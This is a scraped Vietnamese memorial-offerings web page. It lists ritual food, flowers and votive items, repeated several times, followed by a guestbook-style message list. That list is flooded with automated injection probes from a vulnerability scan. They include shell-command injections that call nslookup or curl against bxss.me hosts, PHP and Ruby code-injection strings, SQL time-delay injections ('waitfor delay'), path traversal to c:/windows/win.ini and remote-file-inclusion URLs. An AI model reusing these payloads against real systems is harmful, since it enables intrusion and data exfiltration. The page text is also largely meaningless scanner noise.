anh-do-cung
Củ quả xào mề chay
anh-do-cung
Gạo
anh-do-cung
Xôi chè
anh-do-cung
Oản to
anh-do-cung
Oản
anh-do-cung
Muối
anh-do-cung
Mâm xôi (5kg gạo)
anh-do-cung
Xôi đĩa nhỡ (1kg gạo)
anh-do-cung
Xôi đĩa nhỏ
anh-do-cung
Cơm trắng
anh-do-cung
Chè
anh-do-cung
Bỏng nhỏ
anh-do-cung
Lavie chai lớn
anh-do-cung
Lavie chai nhỏ
anh-do-cung
Trầu cau
anh-do-cung
Mâm trái cây lớn
anh-do-cung
Mâm trái cây nhỡ
anh-do-cung
Đĩa trái cây nhỏ
anh-do-cung
Vàng mã
anh-do-cung
Nến đôi
anh-do-cung
Đồ dùng cá nhân
anh-do-cung
Ngựa thần linh
anh-do-cung
Mũ, nhà, xe
anh-do-cung
Thuốc lá
anh-do-cung
Xe
anh-do-cung
Vịt chay
anh-do-cung
Rau củ chay
anh-do-cung
Nộm chay
anh-do-cung
Nem chay
anh-do-cung
Giò chay
anh-do-cung
Gà chay
anh-do-cung
Trứng
anh-do-cung
Tôm chiên
anh-do-cung
Thịt luộc
anh-do-cung
Rau ngũ sắc
anh-do-cung
Nem quấn
anh-do-cung
Mực chiên
anh-do-cung
Lợn quay
anh-do-cung
Giò chả
anh-do-cung
Gà quay
anh-do-cung
Gà luộc
anh-do-cung
Canh thập cẩm
anh-do-cung
Bóng xào thập cẩm
anh-do-cung
Bánh chưng
anh-do-cung
Hoa sen
anh-do-cung
Hoa ly 5 tai
anh-do-cung
Hoa ly 3 tai
anh-do-cung
Hoa huệ
anh-do-cung
Hoa hồng
anh-do-cung
Hoa cúc
anh-do-cung
Trứng
anh-do-cung
Tôm chiên
anh-do-cung
Thịt luộc
anh-do-cung
Rau ngũ sắc
anh-do-cung
Nem quấn
anh-do-cung
Mực chiên
anh-do-cung
Lợn quay
anh-do-cung
Giò chả
anh-do-cung
Gà quay
anh-do-cung
Gà luộc
anh-do-cung
Canh thập cẩm
anh-do-cung
Bóng xào thập cẩm
anh-do-cung
Bánh chưng
anh-do-cung
Củ quả xào mề chay
anh-do-cung
Vịt chay
anh-do-cung
Rau củ chay
anh-do-cung
Nộm chay
anh-do-cung
Nem chay
anh-do-cung
Giò chay
anh-do-cung
Gà chay
anh-do-cung
Trầu cau
anh-do-cung
Mâm trái cây lớn
anh-do-cung
Mâm trái cây nhỡ
anh-do-cung
Đĩa trái cây nhỏ
anh-do-cung
Vàng mã
anh-do-cung
Nến đôi
anh-do-cung
Đồ dùng cá nhân
anh-do-cung
Ngựa thần linh
anh-do-cung
Mũ, nhà, xe
anh-do-cung
Thuốc lá
anh-do-cung
Xe
anh-do-cung
Gạo
anh-do-cung
Xôi chè
anh-do-cung
Oản to
anh-do-cung
Oản
anh-do-cung
Muối
anh-do-cung
Mâm xôi (5kg gạo)
anh-do-cung
Xôi đĩa nhỡ (1kg gạo)
anh-do-cung
Xôi đĩa nhỏ
anh-do-cung
Cơm trắng
anh-do-cung
Chè
anh-do-cung
Bỏng nhỏ
anh-do-cung
Lavie chai lớn
anh-do-cung
Lavie chai nhỏ

Góc tưởng niệm

Danh sách lời nhắn

1

1

1

1

1

555

1

555

1DdNp6LbgNO

555

response.write(9531736*9761834)

555

36fMIO7C

555

1

1E6bdb4s2O

1

response.write(9781533*9470740)

1

555

1

tovshNxs

1

555

1

555

1

555

1

555

1

555

${9999358+10000410}

555

1

555

1

555

1

${9999449+9999622}

555

../1

555

1

555

1

555

1

555

Array

555

1&n912001=v943206

555

1

555

1

555

1

)

555

1

../555

1

555&n989173=v910801

1

Array

1

555

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

555

!(()&&!|*|*|

555

echo wqcbdw$()\ yojwsp\nz^xyu||a #' &echo wqcbdw$()\ yojwsp\nz^xyu||a #|" &echo wqcbdw$()\ yojwsp\nz^xyu||a #

555

1

555

^(#$!@#$)(()))******

555

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

555

&echo zskkba$()\ qbsipp\nz^xyu||a #' &echo zskkba$()\ qbsipp\nz^xyu||a #|" &echo zskkba$()\ qbsipp\nz^xyu||a #

555

1

)

1&echo gcaxsq$()\ amgdnn\nz^xyu||a #' &echo gcaxsq$()\ amgdnn\nz^xyu||a #|" &echo gcaxsq$()\ amgdnn\nz^xyu||a #

555

Http://bxss.me/t/fit.txt

555

'.gethostbyname(lc('hitxz'.'gmpdxgyr035d7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(101).chr(75).chr(102).chr(66).'

555

1

555

1

!(()&&!|*|*|

http://bxss.me/t/fit.txt?.jpg

555

".gethostbyname(lc("hitjb"."djafdilo5bd76.bxss.me."))."A".chr(67).chr(hex("58")).chr(107).chr(88).chr(121).chr(85)."

555

|echo pchnko$()\ iattcn\nz^xyu||a #' |echo pchnko$()\ iattcn\nz^xyu||a #|" |echo pchnko$()\ iattcn\nz^xyu||a #

555

1

555

1

^(#$!@#$)(()))******

c:/windows/win.ini

555

1

'.gethostbyname(lc('hitop'.'ncytbyekece16.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(97).chr(72).chr(115).chr(65).'

bxss.me

555

1|echo ihmcad$()\ xcjouw\nz^xyu||a #' |echo ihmcad$()\ xcjouw\nz^xyu||a #|" |echo ihmcad$()\ xcjouw\nz^xyu||a #

555

1

".gethostbyname(lc("hitny"."lgxzbest008e2.bxss.me."))."A".chr(67).chr(hex("58")).chr(105).chr(88).chr(102).chr(73)."

1

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

Array

555

(nslookup -q=cname hityyywzssbhe305b1.bxss.me||curl hityyywzssbhe305b1.bxss.me))

555

1

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg

1

555

bxss.me/t/xss.html?%00

555

$(nslookup -q=cname hitqubmqifwdlb935d.bxss.me||curl hitqubmqifwdlb935d.bxss.me)

555

1

Http://bxss.me/t/fit.txt

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

555

&nslookup -q=cname hityaozendnxxbcfb1.bxss.me&'\"`0&nslookup -q=cname hityaozendnxxbcfb1.bxss.me&`'

555

Array

555

1

bxss.me/t/xss.html?%00

"+"A".concat(70-3).concat(22*4).concat(105).concat(65).concat(103).concat(65)+(require"socket" Socket.gethostbyname("hitaf"+"tblgdulu3ebab.bxss.me.")[3].to_s)+"

555

1-1; waitfor delay '0:0:15' --

555

1

http://bxss.me/t/fit.txt?.jpg

';print(md5(31337));$a='

555

&(nslookup -q=cname hitfaljkhgdqdc84f6.bxss.me||curl hitfaljkhgdqdc84f6.bxss.me)&'\"`0&(nslookup -q=cname hitfaljkhgdqdc84f6.bxss.me||curl hitfaljkhgdqdc84f6.bxss.me)&`'

555

Array

555

'+'A'.concat(70-3).concat(22*4).concat(110).concat(87).concat(118).concat(80)+(require'socket' Socket.gethostbyname('hitew'+'baeadbojf5c37.bxss.me.')[3].to_s)+'

555

1-1); waitfor delay '0:0:15' --

555

";print(md5(31337));$a="

555

1

c:/windows/win.ini

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

555

Array

555

|(nslookup -q=cname hitfryngtdqwxa198a.bxss.me||curl hitfryngtdqwxa198a.bxss.me)

555

1

"+"A".concat(70-3).concat(22*4).concat(110).concat(67).concat(105).concat(82)+(require"socket" Socket.gethostbyname("hitml"+"wfhgmmjl3a2b9.bxss.me.")[3].to_s)+"

${@print(md5(31337))}

555

'"()

555

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1EX8nLpm1'; waitfor delay '0:0:15' --

555

1

'+'A'.concat(70-3).concat(22*4).concat(107).concat(78).concat(111).concat(81)+(require'socket' Socket.gethostbyname('hittn'+'vgvgraqy9c608.bxss.me.')[3].to_s)+'

index.php

555

`(nslookup -q=cname hitirlwilrays7d72d.bxss.me||curl hitirlwilrays7d72d.bxss.me)`

555

1

bxss.me

${@print(md5(31337))}\

555

index.php

555

1

Array

;(nslookup -q=cname hitdcwnzgccbhb9bfd.bxss.me||curl hitdcwnzgccbhb9bfd.bxss.me)|(nslookup -q=cname hitdcwnzgccbhb9bfd.bxss.me||curl hitdcwnzgccbhb9bfd.bxss.me)&(nslookup -q=cname hitdcwnzgccbhb9bfd.bxss.me||curl hitdcwnzgccbhb9bfd.bxss.me)

555

xfs.bxss.me

555

'.print(md5(31337)).'

555

index.php/.

555

1

555

1'"

555

1

xfs.bxss.me

1

index.php

'"

555

1

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

1

echo mjntum$()\ ixsndd\nz^xyu||a #' &echo mjntum$()\ ixsndd\nz^xyu||a #|" &echo mjntum$()\ ixsndd\nz^xyu||a #

1'"()&%

555

1

index.php

1

';print(md5(31337));$a='

1

Array